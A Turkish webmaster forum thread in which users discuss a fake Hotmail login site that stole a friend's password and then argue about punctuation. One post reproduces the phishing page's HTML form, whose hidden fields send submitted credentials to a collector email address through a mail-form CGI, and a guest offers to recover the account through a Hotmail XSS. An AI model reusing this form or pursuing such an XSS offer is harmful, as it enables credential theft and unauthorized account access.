İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

fake hotmail sitsinde adsense

GReYDeR

0
İyinet Üyesi
Reaction score
0
ya o bişi değilde
ben bunu nerden duydum onu söylesem size..

bizim bi arkadaş buradan oturum açmaya çalışmışta..
sonuç malum tabi.

sonra benim ortağı aramışlar. biz buraya şifreyi kaptırdık. ne etsek de geri alsak diye

dsgnr

0
İyinet Üyesi
Reaction score
1
senin arkadaşın suçu oraya buraya mail adresi ve şifre girilirmi. bi fırça at bence.

Loi

0
İyinet Üyesi
Reaction score
44
<FORM METHOD="POST"
ACTION="http://cgi.turk.net/scripts/destek/mailform.exe">
<INPUT TYPE="HIDDEN" NAME="email_subject" = VALUE="Katalog isteme
formu">
<INPUT TYPE="HIDDEN" NAME="email_server" VALUE="mail.turk.net">
<INPUT TYPE="HIDDEN" NAME="email_field_seperator" VALUE=":">
<INPUT TYPE="HIDDEN" NAME="email_to" VALUE="[email protected]">
<INPUT TYPE="HIDDEN" NAME="success_message_url" VALUE="http://www.soooryyyso.so">

<INPUT TYPE="HIDDEN" NAME="failure_message_url" VALUE="http://www.soooryyy.soo">
<INPUT TYPE="HIDDEN" NAME="require_message_url" VALUE="http://www.soooryyy.soo">
<INPUT TYPE="HIDDEN" NAME="require:email_from" VALUE="[email protected]">

Arkadasinin mail şifresi [email protected] adresine post edilmis.

Umarim bu yardimci olur.

qdin

0
İyinet Üyesi
Reaction score
1
Merhaba,
Zaten son zamanlarda msn sohbet gibi site adları chat programı kurulup altına 1000000 tane toplist 30309399 tane link degisimi yaparak site adında yayınlanan internet çöpü adını verdigimiz siteler cogaldı bunuda yapanı çok görmemek lazım.

Loi

0
İyinet Üyesi
Reaction score
44
Merhaba,
Zaten son zamanlarda msn sohbet gibi site adları chat programı kurulup altına 1000000 tane toplist 30309399 tane link degisimi yaparak site adında yayınlanan internet çöpü adını verdigimiz siteler cogaldı bunuda yapanı çok görmemek lazım.

Katlettin Türkçeyi! Insan iki tane noktalama işareti kullanir

deeper

0
İyinet Üyesi
Reaction score
0
[COLOR="Red"' Alıntı:
Loi[/COLOR];381092]Katlettin Türkçeyi! Insan iki tane noktalama işareti kullanir

Kimse kusura bakmasın, önce kendine baksın. Şimdi konu fake mail hakkında gidişat ediyor, siz "Katlettin Türkçeyi" diyorsunuz. O zaman nickiniz(rumuzunuz) neden Loi, Insan değil İnsan, kullanır ve sonuna nokta gibi detaylara bakalım. Lütfen kırıcı olmayalım, hala forumda herkez yazanlar varken noktalamaya takılmayalım ;)

Loi

0
İyinet Üyesi
Reaction score
44
Kimse kusura bakmasın, önce kendine baksın. Şimdi konu fake mail hakkında gidişat ediyor, siz "Katlettin Türkçeyi" diyorsunuz. O zaman nickiniz(rumuzunuz) neden Loi, Insan değil İnsan, kullanır ve sonuna nokta gibi detaylara bakalım. Lütfen kırıcı olmayalım, hala forumda herkez yazanlar varken noktalamaya takılmayalım ;)

Ben uzun sure ingilizce klavye kullanmis biri olarak turkce noktali harfleri kullanmamaktayim ancak cumle icinde virgul ve nokta gibi noktalama isaretlerinin kullanilmasinin sart oldugunu dusunen biriyim aksi halde cumle anlasilmiyor. Ben noktali harfleri kullanmadigimda benim nasil bir cumle kurdugumu zaten o beynin idrak edebiliyor ama noktalama isareti kullanmayinca cumle farkli farkli yorumlanabiliyor. Bilmem anlatabildim mi canim kardesim?

Qdin asil sen benim her yorum yaptigi konuya zipliyorsun! Isine baksana bilader! Git havaya para dagit, subhanallah ya!

M

MasterTR

Misafir
o gordugun adsense freeservers in adsense i. bu site icin ozel yapilmi$ bir$ey degil daha dikkatli olalim

M

MasterTR

Misafir
birader kim onu cikartamadim? menapoz/andropoz sorunlarin var sanirim ne bu gerginlik? az rahat ol gerginlik yapma.
SIKINTILI birine benziyorsun her konuya her mesaja atlama abi tavsiyesi sana ;)

deeper

0
İyinet Üyesi
Reaction score
0
Ben uzun sure ingilizce klavye kullanmis biri olarak turkce noktali harfleri kullanmamaktayim ancak cumle icinde virgul ve nokta gibi noktalama isaretlerinin kullanilmasinin sart oldugunu dusunen biriyim aksi halde cumle anlasilmiyor. Ben noktali harfleri kullanmadigimda benim nasil bir cumle kurdugumu zaten o beynin idrak edebiliyor ama noktalama isareti kullanmayinca cumle farkli farkli yorumlanabiliyor. Bilmem anlatabildim mi canim kardesim?

Diyorum ya sana, noktalamadan bahsediyorsun o zaman her cümlenin sonuna nokta koy.

Loi' Alıntı:
Katlettin Türkçeyi! Insan iki tane noktalama işareti kullanir

O arkadaş virgül koymamış, sende nokta koymamışsın. Neyse anladım ben seni, şimdi sen bu cevabımada bi kulp takarsın, bu böyle bir döngüye girer zira çok meyilli görünüyorsun.

Loi

0
İyinet Üyesi
Reaction score
44
Cumlenin bittigi yerde nokta kullanirsinki, sonraki cumle nerde basliyor anlasilsin. Dikkatli bakarmisin ben ikinci bir cumle kullanmismiyim?

Demek istedigim seyi anlamamak icin bu kadar inat edilirmi yahu?

K

Kruis

Misafir
Arkadaş fake ile uğraştığından anlıyoruz ki, henüz Hotmail XSS görmemiş. Eğer çok önemli bir mail ise; almayı deneyebiliriz mağdur olmamanız açısından.

Loi

0
İyinet Üyesi
Reaction score
44
Arkadaş fake ile uğraştığından anlıyoruz ki, henüz Hotmail XSS görmemiş. Eğer çok önemli bir mail ise; almayı deneyebiliriz mağdur olmamanız açısından.
Buna gerek yok, hotmail abuse'a durumu yazdiginizda size mailinizi zaten geri veriyorlar.

Sizden istedikleri;
Mail adresiniz,
Mail adresiniz icinde kayitli olan klasorler,
Kontak listenizde kayitli birkac isim,
Eski gizli sorunuz ve cevabi,
Hangi servis saglayici ile internete ciktiginiz.
En son mailinize duzgun sekilde eristiginiz tarih.

hotmail abuse'un iletisim adersi aklimda yok hotmail.com dan yardim/help i tiklayarak erisebilirsiniz.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5